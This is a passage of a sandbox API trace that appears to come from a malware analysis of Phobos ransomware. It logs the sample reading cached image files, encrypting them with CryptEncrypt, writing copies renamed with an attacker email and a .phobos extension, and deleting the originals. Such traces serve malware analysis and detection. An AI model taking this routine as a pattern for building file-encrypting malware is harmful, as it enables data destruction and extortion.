HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPiby[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbpiby[1].jpg")) returned 0x2020 [0177.432] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPiby[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbpiby[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.432] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPiby[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbpiby[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0177.432] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0177.432] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0177.432] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPiby[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbpiby[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0177.433] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0177.433] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0177.433] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1c21, lpOverlapped=0x0) returned 1 [0177.542] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1c30, dwBufLen=0x1c30 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1c30) returned 1 [0177.542] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1c30, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1c30, lpOverlapped=0x0) returned 1 [0177.542] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0177.543] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0177.543] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0177.543] CryptDestroyKey (hKey=0xa32be8) returned 1 [0177.543] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0177.543] CryptDestroyKey (hKey=0xa32d28) returned 1 [0177.543] CloseHandle (hObject=0x178) returned 1 [0177.543] CloseHandle (hObject=0x14c) returned 1 [0177.543] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPiby[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbpiby[1].jpg")) returned 1 [0177.544] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0177.544] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVGyR[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvgyr[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0177.544] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=7233) returned 1 [0177.545] CloseHandle (hObject=0x14c) returned 1 [0177.545] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVGyR[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvgyr[1].jpg")) returned 0x2020 [0177.545] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVGyR[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvgyr[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.545] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVGyR[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvgyr[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0177.545] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0177.545] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0177.545] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVGyR[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvgyr[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0177.545] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0177.545] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0177.545] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1c41, lpOverlapped=0x0) returned 1 [0177.692] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1c50, dwBufLen=0x1c50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1c50) returned 1 [0177.692] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1c50, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1c50, lpOverlapped=0x0) returned 1 [0177.693] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0177.693] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0177.693] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0177.693] CryptDestroyKey (hKey=0xa32be8) returned 1 [0177.693] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0177.693] CryptDestroyKey (hKey=0xa32d28) returned 1 [0177.694] CloseHandle (hObject=0x14c) returned 1 [0177.694] CloseHandle (hObject=0x178) returned 1 [0177.694] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVGyR[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvgyr[1].jpg")) returned 1 [0177.695] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0177.695] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBWLtW[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbwltw[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0177.695] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1898) returned 1 [0177.696] CloseHandle (hObject=0x178) returned 1 [0177.696] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBWLtW[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbwltw[1].jpg")) returned 0x2020 [0177.696] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBWLtW[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbwltw[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.696] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBWLtW[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbwltw[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0177.696] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0177.696] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0177.696] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBWLtW[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbwltw[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0177.697] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0177.697] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0177.697] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x76a, lpOverlapped=0x0) returned 1 [0178.043] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x770, dwBufLen=0x770 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x770) returned 1 [0178.043] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x770, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x770, lpOverlapped=0x0) returned 1 [0178.044] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0178.044] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0178.044] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0178.044] CryptDestroyKey (hKey=0xa32d68) returned 1 [0178.044] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0178.044] CryptDestroyKey (hKey=0xa32d28) returned 1 [0178.044] CloseHandle (hObject=0x178) returned 1 [0178.044] CloseHandle (hObject=0x14c) returned 1 [0178.044] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBWLtW[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbwltw[1].jpg")) returned 1 [0178.047] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0178.047] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBY98e[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbby98e[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0178.048] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=9246) returned 1 [0178.048] CloseHandle (hObject=0x14c) returned 1 [0178.048] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBY98e[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbby98e[1].jpg")) returned 0x2020 [0178.048] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBY98e[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbby98e[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBY98e[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbby98e[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0178.048] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0178.048] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0178.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBY98e[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbby98e[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0178.048] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0178.049] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0178.049] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x241e, lpOverlapped=0x0) returned 1 [0178.101] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2420, dwBufLen=0x2420 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2420) returned 1 [0178.102] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2420, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2420, lpOverlapped=0x0) returned 1 [0178.103] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0178.103] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0178.103] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0178.103] CryptDestroyKey (hKey=0xa32be8) returned 1 [0178.103] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0178.103] CryptDestroyKey (hKey=0xa32d28) returned 1 [0178.103] CloseHandle (hObject=0x14c) returned 1 [0178.103] CloseHandle (hObject=0x178) returned 1 [0178.103] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBY98e[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbby98e[1].jpg")) returned 1 [0178.104] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0178.104] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBZYVP[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbzyvp[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0178.105] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2360) returned 1 [0178.105] CloseHandle (hObject=0x178) returned 1 [0178.105] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBZYVP[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbzyvp[1].jpg")) returned 0x2020 [0178.105] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBZYVP[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbzyvp[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBZYVP[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbzyvp[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0178.105] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0178.105] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0178.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBZYVP[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbzyvp[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0178.106] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0178.106] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0178.106] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x938, lpOverlapped=0x0) returned 1 [0178.107] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x940, dwBufLen=0x940 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x940) returned 1 [0178.107] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x940, 